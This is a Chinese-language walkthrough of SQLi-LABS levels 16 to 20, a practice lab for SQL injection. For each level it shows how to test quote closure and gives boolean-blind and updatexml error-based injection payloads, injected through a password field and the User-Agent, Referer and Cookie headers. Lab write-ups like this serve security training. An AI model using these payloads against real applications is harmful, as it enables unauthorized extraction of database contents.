SQLi-LABS 16关
1.测试闭合方式
?id=1 //错误
?id=1' //错误
?id=1' or 1=1 # //错误
?id=1" or 1=1 # //错误
?id=1") or 1=1 # //正确
所以闭合方式是 ") #
2.在进行列数判断时,发现该网站只有正确和错误两个页面,所以这里选择布尔盲注进行注入
布尔盲注可以使用抓包爆破,也可以使用ascii进行二分法,这里使用二分法得到数据库名为security
1") or 1=1 and ascii(substr(database(),1,1))=115#
SQLi-LABS 17关
1.该关是修改密码的界面,查看源码得到用户一栏不能进行注入,所以要在新密码处进行注入
2.在新密码一栏进行闭合方式测试
1' //错误
1' # //正常
所以是'#闭合方式
3.发现在测试是会报错,所以使用报错注入
1' and updatexml(1,concat(1,(select database())),1) #
得到数据库security
SQLi-LABS 18关
1.该关在输入正确用户密码时,返回了U-A头
这关使用bp抓包进行U-A头注入,在U-A头输入单引号后,显示报错,所以使用报错注入
2.判断闭合方式
再进行常规闭合方式测试之后,发现都无法闭合,在查看源代码后,得到需要使用 and'进行闭合
3..报错注入语句
' and updatexml(1,concat(1,(select database())),1) and '
得到数据库名为security
SQLi-LABS 19关
本关和第十八关一样都都需要使用bp抓包进行报错注入,只是这里需要在referer报头进行注入
注入语句
' and updatexml(1,concat(1,database()),1) and '
SQLi-LABS 20关
1.本关是进行cookie报头注入,再输入一个用户密码后会显示你的cookie
2.进行bpbp抓包发送到重放器里,如下图所示
3.在cookie报头进行注入发现依旧是报错注入
注入语句:
' and updatexml(1,concat(1,database()),1) and '
得到数据库名security